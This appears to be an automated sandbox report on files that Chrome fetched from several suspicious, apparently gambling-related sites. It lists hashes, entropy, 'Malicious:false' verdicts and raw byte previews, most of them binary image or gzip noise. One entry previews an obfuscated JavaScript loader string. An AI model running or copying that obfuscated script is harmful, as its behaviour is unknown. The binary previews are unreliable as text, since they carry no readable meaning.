                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 48 x 67, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7800
                                                                                                                                                          Entropy (8bit):7.970449245904087
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:+RVNjHK0a1SAiP3yGpvf+k87OS7ZB6JYUmkDdfN7Yf:+R21SAgyImk8ySdBGjsf
                                                                                                                                                          MD5:DE14D15581AC192D20078039F420C19F
                                                                                                                                                          SHA1:B4CAE3879F321B105CD149A6EC0C1CAF5D344CF2
                                                                                                                                                          SHA-256:7C0FAF1993C1A7B6C7493E4394E00F80513E96EA3928A56475FE167BBB2EABB0
                                                                                                                                                          SHA-512:DA4E015669037976D6EF9230EF1CDCF722F2D79CE28805F0406296EB85928D91A4E0BD6D3AB7DE74C5617BE370C79094A289CA934C4148B5E7038087E4592CE3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...0...C...........?IDAThC...xUU.....~N...$..!D.t...AE...k.:.3(*....U.:..c...{..J...H(...sr..{...'.UG....|.y..w.z........'G....-....l?.R...O...SZ.k..S......p...f.o^.....[2}rFf.e..z..9........i.......,3e..,.z..~....z.........$......5.....5...-.R.g.....O.......]n..PU.......n.......^_....Q.A.1..&.y.w.6}...A.f-Rp....#^g=3f.\1..i.p......Hj......&..*...T......;n..N.....'.r.7......h.+7.Y..........Q..'...i..^:..9.d.. +..z..{..<..{.6=.....=E.>e.......#.].h...B.^|...g.<p`..%'..i.G^P>+..[.m.;;.k....o.TT9.*........9.........UR......l../...,.{^l....c...+..@..'.....?.`.%W..{N......C..d.>..+.}..5..~n.5p.../>..6._.{..mW^..Euu........c..i..?.|........<...d...4....E.......?.U-L..x.H.5|...).5%.';...6)....n:.:.!......r9;*.....C&.....o.[3."..}.m...).VFF.O...?{~.@.!.'K.....@.....n.B..$.G.ZB.iiI..n....LM7c...U.$$..:...r.#Ag.j"....O..8]tv.......f....h.p.*I...>P+........J.P..%IIf..A1@2.vu..A3ul..i..hD..C..4.I.$......$..!.i>.)...&..5..a..I..7..Us.].*
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 6959
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1929
                                                                                                                                                          Entropy (8bit):7.896147866550147
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XfrAemjEULMiznaTzg5q7zGNY6o/6UGTi4N8R:PkrQiO6gGNLo/kh0
                                                                                                                                                          MD5:8B4E801D5503887441BD73CF271E664E
                                                                                                                                                          SHA1:A46E84FC4FC0F786DFCCB475AEDBAE067CCA84BC
                                                                                                                                                          SHA-256:2037542592A6F0B6B63E3CB1151DD3BC9F9906FE4304A8FDFFE2332F19FB14BC
                                                                                                                                                          SHA-512:738C5E31A7DA66C06F1B06408E89E8B9835A4B4DDB2526A85CFBD57E47F40B79B60E92E6F0DF89748D0439830AF28C2161AB6548F4A4903BFB910AABAE1B11E0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/float.js
                                                                                                                                                          Preview:...........Y[o.G.~..R.wa.8T.RLZ.*..U......=N..w..u.D#E".....($..%...........E.....z..H....9..\..w.....!.m...BB..|..+R|])_E.>..w(%2.#x\...!.W..D.v..U]..1M.....G....]..?(YL.K..e.y6M..KOH9..{eh..O..'.t.Qu...X..K7&.io..dN.b..........@...v..hT6.Va..V.4..Ed...2G./U.<..hT=s...&:\....{.P.9.zk..Q......IL..S..L.]...#..!....h.u..+...g.....OW.oT..F._..}..Y.w..K.c....n......H..P..H..J...6..b.....=...5yT...'......f.C.XMfLS....M.*......Z.pB.....%.:K..a?X'[...%......S..6..&...e........."....5.F..(..G.'[F..5...M.^J.5..tC...A...7..>..B..D....f..J400....?..}..|."...\x-....hab.facTV.. ...Y..$3....E.....L.......e....[.kO`..L..I58..,.....Ux........U2..*}4}...*gb.Bpa.2.......-K.c...#...t.O..7...`On...O7.Y.P`.....#.UY.. Q..4.X.m..9..<.......0.y3.A#%."J".?..K.....rJ.bN.o..?.wL.Z.>..4.Z'.w..s.u..... ..F..}...a.A.kz$.>......t.....%....[Sw....M..3..t....%.2..8>..y.s.}..90u.=O......_Lq.y8..q..V..PN...5E^.X...nV7o.K.M...Z.....s..sZ+./...SyS.N...8E....n.4..m.3
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 263 x 262, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17624
                                                                                                                                                          Entropy (8bit):7.961614448405698
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:LlGu9DcD0glOL8a4paq6dArwR/rjzySZIJ9M9JQEZBk:gu9DcYgwKaq6myXzj6gDQE0
                                                                                                                                                          MD5:16872E229AF894533A44030600391226
                                                                                                                                                          SHA1:8FE28588BB2F0CACA290DC09ED6EFE32B86ABB33
                                                                                                                                                          SHA-256:4B78F9508173A55374FA3084901F3CC0ED0866630B3D9A943EB01CBA2DF9DD6C
                                                                                                                                                          SHA-512:6F12B8AC6A26E2A01352F1674F8FD8C878FBE25E9C6E0B3489AE82B97DB166CDA51030846E439EDDA03C4C221D9417F75AF3D2AE70E2F50DF88D5AC94BB41CEC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/10082.png
                                                                                                                                                          Preview:.PNG........IHDR.............h.P.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:A690DA76239111EEAB34E7F8E7762A7C" xmpMM:DocumentID="xmp.did:A690DA77239111EEAB34E7F8E7762A7C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1236A6B237811EEAB34E7F8E7762A7C" stRef:documentID="xmp.did:B1236A6C237811EEAB34E7F8E7762A7C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>:w8...AFIDATx..}k...y.o.q..9....c7....c.J1!q.'NI....VV...B....@.*.."....BT.".....@.?.m....EM.M.'.!vb'Nb.'.]..\.=>
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40838
                                                                                                                                                          Entropy (8bit):7.986245075878669
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:cFJMTmRy3jS/gow/xY2eL+/sAYa8MMe+v5+zGyxKDrNYB4C0:cLMTms3+/1wpY2eL+0bIFGya5F
                                                                                                                                                          MD5:271B08461D3D25087974C90C4DD150BD
                                                                                                                                                          SHA1:C10092994F198AE2CF260D831CD1D1FF6770DB6A
                                                                                                                                                          SHA-256:B13A412A300FA5067B4FA14BBEE1E0400D959011DE43644FEB68061805B00DD7
                                                                                                                                                          SHA-512:67E58C1458E4DA45CC441F62F4BCF607E129E9C671BF92C8A1BA27D9538E1311DCED258FD821E8EA28226BC7F0BA84EA5449203642BE494DAEA8C2E03BDDE440
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.\.q...O.<7G..9'.`&E0J$..DQ9g.i.v..^{..:.V.T..%Q..A....@".ps.<sRw..8s.P.%Q.....m>.{q..9.tWWUW}.[...C"...5...Dr)W........F-......*...u.}....._r..o<..........1.".o...ro..$\..k.............3.?a...`....b.m.($..}..b ..}w..........0uj.#..p.:U.=|.....f97........g8..o.I.7...x.._.C.D.....=....{.g....b.o.&.1...<d...-.......s.........B............Q.k...p....?{w......a.h.I..DZ ..x`f..C.7.s.l..]o..%5......C...D"Qg.os.k^..-{.g.:.....L.....y....4gE.#.B.@..=.F...y.....]./.........!.@(4...|...../,b.$..kN1z..6@.+....^r.....N..v.....y...@....E..T...T..E....0..B....n~.NB(.2..Q.0...%...q......l.P..B..[1i.R...b..P.h.).(...0.A,$Fc.....Pc....e.{.n.k%.....6.b(..#....z.W...y.s...v.8o}.N......>.d.U...b./.nn!B....w..QsjF..#.B.. .@....,J.`.@.1p.+l.~...w.^..W.#....PA..^.;oK.r.;.X....[n.]...M... [A....r(,...X.4.....Y.p.=......p.~oe#.h.\..w..:.EhZ.m.g.......... @#1
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):42776
                                                                                                                                                          Entropy (8bit):7.985852973021171
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:evaTwKugw/mv06oFDLQ3Md7XWTQ9RMblzjv6PGXuW2Sl27crk9E:5ut+vKQ3Mg0RMbBjv4CuUlp
                                                                                                                                                          MD5:6E7E50BD47161A5C2F5CAFE0DB7639CE
                                                                                                                                                          SHA1:E136ED8078A1770EF631E760D7B41E79B50EC3F6
                                                                                                                                                          SHA-256:3271EE0BA2312DD3998E3B400E8B99D59DD9EE4B8DA3557E09228476F4FE9C0C
                                                                                                                                                          SHA-512:2CBB35410EBD9F77BBBB0F35CD9BBFC11150DBE9497ECACE197496FCCBF21440F0C874D73CA99DA5F744101CB0626CEF6991D58E44475B2A17C8139B856A0F24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/liveCasino/03.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w..Uy...Vy....C.* .Tc..M.(..f..|bL.1.|cb....%.......P.f..No.>m........R4.|..k_S.>{?.Z.s........eI..#Wp..~...j..{..M..V..'.^....l.K}..#.|./...../....;K..-.1.C`..{../p.K}..c....s,.........F;..H@....>...h../.%..Y.+l.$..l.....k..D.V....:.-..2.w...Z.6$."...C>|.......?....R_.....;.,....b]....&I.F.....~.%^..........J....s..K}U...K.....=..}.e.~.=..&...l...tE.~.\..=.#,8P.\...+v....\V...7}..B....._..g...o.L{..K..K....w.....\/m. .~.>...V..[E....c..o....("..p..%%.s$..........U.g.3..$@......g@.....N.%.b.(+Px(<......{.{\..=.......:...A....,|.].........>.u{_...>P.z9...,.s...3W8..S....#....).t.n....S.Cv.h^k)...8B.>........d.~=.f6......DF.C.C.C..I.G...T1...j.g.`{<g...H....z9..;.....a...>.....?..p.^Ra.N.......b~..PK@-...h.....m...[..K...$.t..5%......X!w.H...2..1......p..r..~........|...R.W.._.w.TQ.A.@..dI...^...e......\.......Zm...\.!B.....x.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12770), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48883
                                                                                                                                                          Entropy (8bit):5.895719351461312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:0u8tECCvnRM7cDkbzEUF+ac8qDASSSYu8n+niAVFD8TAdy9pmyQg8jUgFgi09/Ld:0sCaa7c4zEUF4TDASSSYJ+VVVOegN9Z
                                                                                                                                                          MD5:753C69F5B67A5DFE5CF11DDD01470304
                                                                                                                                                          SHA1:E81D212744CB7AA6453BA1EA7621D3DFF5C930BC
                                                                                                                                                          SHA-256:5FF3009B9DB304FC23897443B8249CBDA798CB417999517C5F295BB8CB8B32B7
                                                                                                                                                          SHA-512:E29963F1B911AA839BD194443F432146E85607923D0FF3C702524E8AB6894C318AB8E9CB3BBD5ECA3467046037F6C2F3E3327F20E8D4C08150AEE75018E5B608
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://xpj723.cc/
                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1">.. <meta property="og:description" content="Welcome">.. <title></title>.. <style>.. html,.. body {.. margin: 0;.. padding: 0.. }.... .retry {.. display: none;.. text-align: center;.. height: auto;.. width: 100%;.. line-height: 3rem;.. padding: 0 .5rem;.. box-sizing: border-box;.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. }.... .retry .btn {.. border: 1px solid #eee;.. border-radius: 4px;.. width: 120px;.. display: inline-block;.. font-size: 16px;.. cursor: pointer;.. box-sizing: border-box;.. }.... .retry .btn:hover {.. color: red;.. }.... .counts {.. color: red;.. display: inline-block;.. width: 24px.. }.... .iswx {..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (34888), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):34888
                                                                                                                                                          Entropy (8bit):5.980968634743434
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CJtKVExV+YblDV3XQ2ftp3XyBEeAstLiv3rIs8qLDM4w4ov:HVEuYblDfjhkcb8oo4Fg
                                                                                                                                                          MD5:9ADE5E638AC25F3589817E3E2F3CB74C
                                                                                                                                                          SHA1:62E6016D419A3E4A5FC5A17DB8C79DBEF4DDBF4F
                                                                                                                                                          SHA-256:61DA4F7CA1099C1344F177742C485F1128AC6FE61BB8DAEBF320733BAB65372B
                                                                                                                                                          SHA-512:9EC7E31B4B579C72BF6D46F1632060C6A01814B926CB39D2FE72D98F00BF1940079148938F8A956BEABE78E783AAA6F693D9E93783C8FD5E62252E7FFF36658C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/layer.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBYBWAXQBoBvAIgAYBhALwE9qAuAMwFc0YAXAJbpMIcn3ICAlJQBuUAE4ACJAF4aAOgD0fXADZa+TQBsozEPPUArJO2zVizBF2rlcATlwAOCtS198tABMgcam5lY2bHZoAI6acC7uuIQ+fgH4bqFmFta21AAyACIAcsCJHrSp2vjJhibZEXmeHMQAiuW0ulX+esRZ4blR1AAaABIAmgBaHYHdNQDsdWE5kXYAsgDKALbtrp5u3uS+1YF6/St5jDAAggDyifspR2mnnueNQ/jXXCgPbpXPE66TL1AarahgPgbQIPTxdQH+Gog5YfOx8YYwaZ7TyzBH4DK6d6DOwgAAeAHMAAoPeaHY7+Qg1IngwLEABinhpT3pRHmuGZeUCABMIAgaQCeYR5iFQRchvJGJpOXtdPDJfNCAKhkh8jAtg9dLjJZ5+bLUdQUMw3OMHsQ6WlCG5NWbidRAoxKTJbdyHW4+i7wVsANS6Iy2iVpYi0WhauwcSkwNYPQhqyO0N4BvJIAAWfDQyaNkeSseoWwAkghCg98PbqsQAiWULpRtnqz660zM0NWmWIL89gE5sRCKaUa6AKrXSlsh6BVN1xklkNcYizwsL51j8EbGBcCAPLxDw2NkAQABKB/b/mIbkJXbsumujHze1wuCHBxL2YAKowhQ9aHmOZ9HmEt5AEDZVz2AxgJHJcjGARhEnmNw3GA4hRwaV0EEmSYElcFCyDxXRiBlLc8l0ABxGQxQIjxgN0UD72oDh8HkDhkM8IDiPmf1yPlEBaAAIU4/BgJQktiDLRgwwIlDgM8PisPBAA1IVNBnOSiJ5XRPAzfi7EsUZRig3B5j5OY+SUsE8nHNZcF2MzGMs/QSzZJAAHV/wI3QxLxeZdEwmyhkIARcBsAib0sxYS10Yo4DKSLtLSczN2UvJJkINkYGQjDousuU7FuZgIG8sypWi5F0qGYYuGGEBk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10701
                                                                                                                                                          Entropy (8bit):7.9683076433498226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:+SdVshSZ4mxnmA3R6d/9kODoOPrubmB0MrLSvpx84uIapLD6C1nSulXf4sKtYTe:h/7+mxX8kgr0Mnl4uxpLD6c+lp
                                                                                                                                                          MD5:FC0682F5F2A62EC1287508A138A5DCE8
                                                                                                                                                          SHA1:4454F4AC6D257B8FF7C84C67182BF7422FF2988D
                                                                                                                                                          SHA-256:D12E4A7B6B428F854D400D33D4638417A3A8D45BF488ACBF85721855EB813857
                                                                                                                                                          SHA-512:F70441DDD92343EEC52AFDA2439582B73484C3140D55507AAB41E32923B7A396D1B6FC8C6795E97F23DCEFDFD059F66D2A6DA442D2A87CECE2E3DF4CA87D1669
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...P...P............sRGB...,.....pHYs...............)rIDATx..}y..Wy.w........I.d.eY......f..8.S...b2.@QT.. ..OMQ.d...C.M....x(.p!L..ey...,Y.....m...........'#.,...{_..s~.[~.w.y.{:*O.u...".6.Z.....h..a.n).......r..E4.u.....<.....e.(_.=.}...].......;.0.9....b..9%.U.......'Ey...........a.6O*ub......HZ=\.v...M.u...H....7EQ{.........J=a...u...Y.u=..[.)...`.8..`..m..........Q7GQx..y.. +Y18s.3...........t.>W.........=.K.l=.f.s..7. l[...z.%....Z....?....8;zns.........p...Y....0z.>.B.U...nt.C...o....o....u}..nE.o.-.\...ic.T.......B.2m.2.A@q..j.2..2.G.<.]........uP..q.U..|.........k.M.&......:...Q.;..:......v.T+.pm.h....H.U..1pi....@mT....I..&.hQ.2..O..2.,.W.s....=u.g ..B...~S.V....j.....|...*..a..s..H^dAs..9PC4.1.#..x.<.....qd|...y.U.......vj...3.E..Z....Ps.o...;..m.Z....o..7. $.G...}...N..n..LM...<.4O..|.(.N..U.J.R*%xiY....".@D..p.Tr.."..g..;...\..R..".z>..](i...iHb......?s.BT..h...;:..6 .5......C.D.\#y........1.+....j#..m
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 61020
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15779
                                                                                                                                                          Entropy (8bit):7.985132186137957
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:HUMeMD7CKDqG9SmepDPqHAZrP0IIdU6QCz+O8kIfHfq37s1:ueuISm6DiHANPIK6R+ffq37s1
                                                                                                                                                          MD5:A82B3B82DA26DF061D5D7D0AB1607C7C
                                                                                                                                                          SHA1:2E6D933FE312254EBF4E07D0BDCFF97E9A0CF0AC
                                                                                                                                                          SHA-256:0796E96C23716CC6ECB811E5066B2E69854E5E5DD36AF768529DC42234302506
                                                                                                                                                          SHA-512:32AB769CA0C66870353B47E126BFE85E258CCF75A36DB411AC32DDCE7D2684953B9F0AA867DAE16FC9DAAFD1BE4533C1E298FA0A30F6D9D9B04C278C88EAEC5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/gui-base.js
                                                                                                                                                          Preview:...........}....q..._1;Z..,.X.4e...}.hK"ER.......,..b `.%..{JbG.-..a.qr....."9...9.}......../\UWwO.L..KJy.`.;...U.U....c..-...o......KW..Ym...r...g.>x..w.z.........I...F.^k`.i..M.f.....r)HBk?.F.(.Zg.W._..}....X.5_..N.............jJ.:..`..p2....n......Q.r....w..n. .&}...g.uY..P.....P..n....'.q....=.m.J....n........Y....X.Xm.6.!......@...p.../;.........r-.o..M...$j.B.r....pO@.77..$....Q...b.X.A<.m..$.....7..7....h..?....../?z.....W.......6....'......>.....w....'..W.../.}...;o..........{.:..g.?......|..............Y......F`..a...%......Am/...a..h......o....._k.....q2.....id..U^xsc.s7....:...m....l.mMxc....{.....UdC...?...W(5..4D...=].u..6...p<..jxo4...X6.p$...M.O?}......@Xm...........;..].U.:.x....r.h........m.JP.D.Go.P.......?..O.~.. |..i.VC...#..tls....(.vo..*Z.H......A......(...D..z.l.Qk...m'p..ZoX.`q_&...q.L.C+.u.^0.$...U.i.T..{...4mD...i._....K.....h?l...=&/..,.&.ho.'4..=.....kBv.l..A..A.Q'H....D...D.L....#...t0..4..x:...A..w1.7........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):335177
                                                                                                                                                          Entropy (8bit):7.974380600086491
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:xvUjWLNXwjsXwjsXwjsXwjsXwScllxfk+RRxfk+RRxfk+RRxfk+RRxYZgTio+TiT:FUiZ+s+s+s+spcbxfvzxfvzxfvzxfvzH
                                                                                                                                                          MD5:24AB22992356B3C8CB58A6A8DEBDF2BE
                                                                                                                                                          SHA1:52DF59276698BAE905D532DC4A2D30383B3D1CAC
                                                                                                                                                          SHA-256:B0E7DB5763D3CC1C7EEB2D72F49BDB543CFDBEF71BF6CFC894EBD60305672903
                                                                                                                                                          SHA-512:8A88101E7020F6E26772AC0D7EC8EDAC388358A711054362E5CB08C2412CF3F4D080DAD4B0DD14C856F81189BA3AC29AB00C93FEB5AF940C46DAC2B86F22261C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/0c3fb40c0b1b142849b7f16af333a5f2.gif
                                                                                                                                                          Preview:GIF89a..d....#...............J.n....lQ....S..).eE1................q0....*..O.......,....yD........u......iU+th3..h.hhb..h.....,...A97..nml.D._g2.+..U.7B.......WD.vkI..&........w....d.....j..V.......5.Z!..FXF#.F.r..PNI...n....|b......u..x..D....g(!...h...BB9...t...D..z....W..l..B)...........F5......).....x...1"..)........t..SN....g.l,..v.1O..h..W..NG....u.\......t.f*."4)!.*...G.WI4.......kdX>.......[(......_o...k$...I....%...o...}/.*H.......&......T8...Y....JJ=!XS8.....4....x.Q....91.........'..c..\P(..@M9...K91.....|.....b.....W...<(..Q2.....m.......D2....3..=w...6....dJ.."...Y.ZUMf..m..9...[[X.....J...])...Y9).1!.]bd]...-o...9!.........................1).......9)............+) ..........R.....1..bIj)!!.................H............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 229, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):115
                                                                                                                                                          Entropy (8bit):5.031580175895274
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlEakSFkrIOK/ughl/Wxf8zwotoltjp:6v/lhP7kuksOKWghbzz4dp
                                                                                                                                                          MD5:AE81DFB415015CEEA84C6989752284B5
                                                                                                                                                          SHA1:C2C4844E7A46A5BA5FAEEFA050082872D1A0BECC
                                                                                                                                                          SHA-256:69D4C7CBEE83B38F029866A7355506837410E7333A11DFC4A70AC047BA1BA8B6
                                                                                                                                                          SHA-512:E3BA9F931B9BB1BFFC8B3EF6EF1B08AE0520549F3E606DC8D3FF49B99637E97B2C065CFA7C3EE7C25EECD63773CDBE025BD2FEBCAA3229E0806C31CC13FF4C8F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR................^....PLTE...YIK........tRNS.@..f....IDAT..ch.C.h C..RS.b..!.=..;|4.W.<.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 51040
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6923
                                                                                                                                                          Entropy (8bit):7.966497753792618
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:gGzWJD0UqUdMjERb7WA4oosvijz7tpdNoyjlMR7i+:gIWJ5qUrOAfVqjPtnSgMhz
                                                                                                                                                          MD5:657C75ACB32EC5C4BBE754E74CEE87F1
                                                                                                                                                          SHA1:EAC1C97F5890172E01EF96F7072A61E16FB092B0
                                                                                                                                                          SHA-256:EC2DBC190D02E033780990A716E52AD3672EF244BF71CE89923157309B744934
                                                                                                                                                          SHA-512:E2928D994B69961B7AC13E78EBF8B54ED947A7127BEDBD7128784C880662A83DE5C1343E76D45B1BBEE883E526711C9FD81B10A8066991C7D38E3C55BC770300
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/commonPage/themes/gui-layer.css
